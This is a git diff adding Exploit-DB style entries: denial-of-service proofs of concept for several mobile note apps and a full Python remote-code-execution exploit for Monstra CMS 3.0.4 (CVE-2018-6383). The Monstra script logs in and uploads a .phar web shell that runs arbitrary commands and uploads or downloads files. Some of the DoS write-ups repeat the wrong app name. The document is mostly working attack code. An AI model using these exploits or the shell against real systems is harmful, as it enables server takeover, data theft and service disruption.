diff --git a/exploits/android/dos/49946.txt b/exploits/android/dos/49946.txt new file mode 100644 index 000000000..6434b7f5c --- /dev/null +++ b/exploits/android/dos/49946.txt @@ -0,0 +1,35 @@ +# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC) +# Date: 2021-06-03 +# Author: Brian RodrÃguez +# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX +# Version: 4.3.61 +# Category: DoS (Android) + +##### Vulnerability ##### + +InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against Android 8.0. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 50000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49952.py b/exploits/ios/dos/49952.py new file mode 100755 index 000000000..a131a0ad6 --- /dev/null +++ b/exploits/ios/dos/49952.py @@ -0,0 +1,35 @@ +# Exploit Title: Color Notes 1.4 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136 +# Version: 1.4 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: +f = open("payload.txt","w") +f.write(buffer) +f.close() +print ("File created") +except: +print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49953.py b/exploits/ios/dos/49953.py new file mode 100755 index 000000000..6f509fc40 --- /dev/null +++ b/exploits/ios/dos/49953.py @@ -0,0 +1,35 @@ +# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221 +# Version: 5.5 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49954.py b/exploits/ios/dos/49954.py new file mode 100755 index 000000000..94d1838eb --- /dev/null +++ b/exploits/ios/dos/49954.py @@ -0,0 +1,35 @@ +# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 +# Version: 5.3 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/php/webapps/49949.py b/exploits/php/webapps/49949.py new file mode 100755 index 000000000..d92fdb924 --- /dev/null +++ b/exploits/php/webapps/49949.py @@ -0,0 +1,101 @@ +# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) +# Date: 03.06.2021 +# Exploit Author: Ron Jost (hacker5preme) +# Vendor Homepage: https://monstra.org/ +# Software Link: https://monstra.org/monstra-3.0.4.zip +# Version: 3.0.4 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2018-6383 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit + +''' +Description: +Monstra CMS through 3.0.4 has an incomplete "forbidden types" list that excludes .php (and similar) file extensions +but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code + by uploading a file, a different vulnerability than CVE-2017-18048. +''' + + +''' +Import required modules: +''' +import argparse +import requests + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383') +my_parser.add_argument('-T', type=str, help='Target IP') +my_parser.add_argument('-P', type=str, help='Target Port') +my_parser.add_argument("-U", type=str, help="Monstra CMS Path") +my_parser.add_argument('-u', type=str, help="Username") +my_parser.add_argument('-p', type=str, help='Password') +args = my_parser.parse_args() +target_ip = args.T +target_port = args.P +Monstracms_path = args.U +username = args.u +password = args.p + + +''' +Exploit: +''' +# Cookies: +session = requests.Session() +url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php' +cookies = session.get(url).cookies.get_dict() +value = cookies['PHPSESSID'] +cookies = { + "__atuvc": "9%7C22", + 'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9' +} + +# Construct authentication header: +headers = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php', + "Upgrade-Insecure-Requests": "1"} + +# Construct authentication body +body = { + "login": username, + "password": password, + "login_submit": "Log In"} +x = requests.post(url, headers=headers, cookies=cookies, data=body) + +# Construct Exploit link: +url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager' + +# Construct Exploit header: +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------27822155982314896762160847658", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": "http://" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager', + "Upgrade-Insecure-Requests": "1" +} + +# Construct Exploit data: +burp0_data = "-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"csrf\"\r\n\r\n1e71963993909d612c40962b401c556b70e9bb3c\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n
\n \n\n\n\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n\n